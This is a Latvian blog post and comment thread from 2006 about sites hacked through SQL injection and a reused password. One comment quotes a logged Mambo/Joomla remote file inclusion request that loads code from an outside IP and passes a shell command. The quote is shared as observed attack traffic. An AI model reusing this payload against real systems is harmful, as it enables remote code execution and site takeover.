MaKo
Bēda 
4.-Mar-2006 01:20 pm
Script kiddy neliek mieru joprojām :( Pagāšnakt gan mako.sauc.lv, gan vesture sauc.lv piedirsuši ar http://milw0rm.com/ exploitu palīdzību. Standarta SQL injection, cik varu spriest. Rokas nolaižas un nezinu, kā sevi motivēt tālāk ar šiem bezmaksas projektiem strādāt.
Comments 
4.-Mar-2006 01:37 pm
a kas ir script kiddy?
4.-Mar-2006 02:07 pm
Paldies vismaz par to, ka nenoraadiiji linku uz wikipeediju japaanju valodaa, blja. Nu nav mana anglju valoda tik spiidosha, lai uz pagjiraam meegjinaatu tamaa kauchko lasiit.
4.-Mar-2006 02:09 pm
Ufff. Nu, ļautiņi, kas atrod citu uzrkstītu programmu, kurā jāieraksta uzburukuma mērķa adrese, un jānospiež enter, lai sadirstu citu vairāku mēnešu darbu. Un tad viņi jūtas hakeri un baisi gudrāki par to, kura lapu sajājuši.
4.-Mar-2006 01:53 pm
automātiska rezerves kopēšana katru nakti...
4.-Mar-2006 01:58 pm
Nu ij ko tas dos? Atjaunoshu - atkal sadirsīs. Man nav laika pingpongu spēlēt, un es neesmu programmeris, lai caurumus SQL pieeprasījumos aizlīmētu.
5.-Mar-2006 12:50 pm
a kam ir laiks?
4.-Mar-2006 06:50 pm
A no kurienes tas notiek? Kaut kādi logi ir?
4.-Mar-2006 07:03 pm
Nez, pirmdien, kad servera īpašnieks pie saviem dzelžiem tiks, uzzināšu. Bet IMHO, ja script kiddy nemāk proxy lietot, tad viņš ir galīgi dumjš, un uz to es cerēt nevaru.
4.-Mar-2006 07:30 pm
Cerēt uz to nevar, bet reizēm vienalga var pabrīnīties par cilvēku stulbumu. Varbūt kādreiz, ja būs labs prāts un reāla satikšanās, varētu vienu otru brīnumu pastāstīt ;-)
P.S. Un ja tajā brīdī vēl atcerētos ;-))
5.-Mar-2006 01:16 pm
meegjinaat dabuut kaadu kas to lietu pieskata, vai arii nezimantot populaaraas un diemzheel krietni caurumainas gatavas sisteemas, koes citu tev varu ieteikt

vai arii uz registered users only
6.-Mar-2006 03:24 am
Nelīdzētu registered user only.
1. Bija vecs projekts ar cauru phpBB forumu, caur kuru veica SQL inject.
2. Es, savā stulbībā, nepadomāju,ka tam mudakam tagad ir mana parole,no SQL izvilkta, ko lietoju vairākos standarta projektos (tas man tagad iemācīs veselīgu paranoju).
3. Mudaks ar šo paroli tika pie viena mana e-maila. Un tur bija logini/paroles vairākiem saitiem. Ko viņš nevilcinājās izmantot. Pie kam ne normāli deface uztaisot, bet nonesot nafig.
4. Tagad raksimies pa Latnet un ML un citu provideru logiem, skatoties transakciju vēsturi. Ja izdosies atrast IP, kas nav proxy - tad man drusku žēl tā huligāna. Projektu īpašnieki ir gatavi vērsties policijā.
6.-Mar-2006 03:26 am
Tfu, nu tu saprati - tas biju es.
6.-Mar-2006 07:17 pm
nu sapratu

laigan celjs idiotisks tb nonesa tevi pateicoties tam ka kaadam aakstam bija caurs phpBB... njaaa nu ta es to sapratu
8.-Mar-2006 10:16 am
rodas sajuuta ka vereetu buut ka tu taaa ari neko neatradiisi...

http://r21vo.id.lv/?cat=blog&id=223&sk=0


Tā kā es sekoju līdzi trafikam uz lapu, tad jau kādu laiciņu parādās interesanti ieraksti ar aptuveni šādu pieprasījumu:
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid ]=1&GLOBALS=&mosConfig_absolute_path=http://163.24.84.10/heade.gif?&cmd=cd%20/

Pagūglējot, manīju ka mainīgie ar tādiem nosaukumiem un līdzīgos virknējumos tiek izmantoti lapās kuras izmanto Mambo CMS (tagad saucas Joomla). Varētu padomāt ka šams ir caurs..

Ja nopietni, tad mušas runā, ka tas trafiks nāk no "Defacing Tool 2.0 by r3v3ng4ns".
8.-Mar-2006 10:37 am
Es tak saku - script kiddy.
Joomlai nupat jauna versija iznaaca, kur esot iepriekšējo caurumi aizlāpīti.
8.-Mar-2006 06:49 pm
njee es akal sapratu ka tas ir kauakads bots kasshance neatkariigi no cilveeka TB nevis scriptkidy bet vienkaarshi bots ;( un ko tad atradiisi....
This page was loaded Nov 8. 2024, 1:23 pm GMT.